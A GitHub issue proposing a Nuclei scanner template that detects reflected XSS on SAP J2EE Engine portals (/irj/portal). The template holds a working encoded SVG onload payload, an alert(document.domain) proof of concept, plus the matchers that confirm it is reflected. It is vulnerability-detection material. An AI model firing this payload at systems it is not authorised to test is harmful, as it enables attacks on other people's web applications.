### ISSUE TITLE
XSS on website with /irj/portal path

### ISSUE THREAD

**Issue by umair-villanio** [projectdiscovery/nuclei-templates#6894]
### Template Information:

This template searches for a specific string in the response body that is vulnerable to XSS. This XSS method is only possible on website s which has a path of "irj/portal" and which uses SAP J2EE Engine.

Reference: Found this on https://www.youtube.com/watch?v=fnOSLnR6NaQ

### Nuclei Template:

```yaml

id: xss-irj-portal


info:
  name: XSS on websites that has /irj/portal path
  author: Umair Hussain
  description: Detecting the presence of XSS vulnerability on websites that have a path of "/irj/portal"
  severity: low
  tags: xss,portal


requests:
  - method: GET
    path:
      - '{{BaseURL}}/SAPIrExtHelp/random/"><SVG ONLOAD%3d%26%2397%26%23108%26%23101%26%23114%26%23116(%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e)>.asp'

    
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Server: SAP J2EE Engine"

         
      - type: word
        part: body
        words:
          - "<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>"

         
      - type: status
        status:
          - 200
          

```
